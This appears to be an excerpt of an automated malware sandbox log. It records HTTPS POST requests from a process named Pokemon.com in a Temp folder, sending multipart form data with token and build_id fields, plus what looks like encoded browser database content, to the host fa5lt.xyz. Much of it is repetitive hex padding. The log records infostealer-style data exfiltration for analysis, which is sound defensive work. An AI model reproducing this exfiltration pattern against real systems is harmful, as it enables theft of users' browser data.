                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 30 63 32 4e 79 5a 57 56 75 58 33 56 79 62 46 39 69 62 47 39 6a 61 33 4e 66 59 6e 6c 77 59 58 4e 7a 5a 57 52 66 59 32 39 31 62 6e 52 6c 63 69 42 4a 54 6c 52 46 52 30 56 53 4c 48 4e 74 59 58 4a 30 63 32 4e 79 5a 57 56 75 58 32 52 76 64 32 35 73 62 32 46 6b 58 32 4a 73 62 32 4e 72 63 31 39 6a 62 33 56 75 64 47 56 79 49 45 6c 4f 56 45 56 48 52 56 49 73 63 32 31 68 63 6e 52 7a 59 33 4a 6c 5a 57 35 66 5a 47 39 33 62 6d 78 76 59 57 52 66 59 6d 78 76 59 32 74 7a 58 32 4a 35 63 47 46 7a 63 32 56 6b 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 7a 62 57 46 79 64 48 4e 6a 63 6d 56 6c 62 6c 39 74 59 57 78 32 5a 58 4a 30 61 58 4e 70 62 6d 64 66 59 6d 78 76 59 32 74 7a 58 32 4e 76 64 57 35 30 5a 58 49 67 53 55 35 55 52 55 64 46 55 69 78 68 59 6e
                                                                                                                                                                                                                                                                                    Data Ascii: 0c2NyZWVuX3VybF9ibG9ja3NfYnlwYXNzZWRfY291bnRlciBJTlRFR0VSLHNtYXJ0c2NyZWVuX2Rvd25sb2FkX2Jsb2Nrc19jb3VudGVyIElOVEVHRVIsc21hcnRzY3JlZW5fZG93bmxvYWRfYmxvY2tzX2J5cGFzc2VkX2NvdW50ZXIgSU5URUdFUixzbWFydHNjcmVlbl9tYWx2ZXJ0aXNpbmdfYmxvY2tzX2NvdW50ZXIgSU5URUdFUixhYn
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:23 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:25 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:24 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    27192.168.2.549947116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----O8Q168Y5PH47YUK6FU3E
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 393697
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 31 64 36 65 32 38 36 39 62 30 31 65 35 32 38 38 64 35 65 39 35 31 32 35 62 34 34 39 38 63 34 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 4f 38 51 31 36 38 59 35 50 48 34 37 59 55 4b 36 46 55 33 45 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                    Data Ascii: ------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="token"e1d6e2869b01e5288d5e95125b4498c4------O8Q168Y5PH47YUK6FU3EContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------O8Q168Y5PH47YUK6FU3ECont
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:24 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                    Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:26 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                                                                    Date: Fri, 27 Dec 2024 13:47:26 GMT
                                                                                                                                                                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                    28192.168.2.549966116.203.8.1784436468C:\Users\user\AppData\Local\Temp\208079\Pokemon.com
                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                    2024-12-27 13:47:27 UTC324OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                    Content-Type: multipart/form-data; boundary=----SJW4W4OHLXBIEU3EUA1V
                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                    Host: fa5lt.xyz
                                                                                                                                                                                                                                                                                    Content-Length: 131557
                                                                                                                                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                                                                                                                                    Cache-Control: no-cache
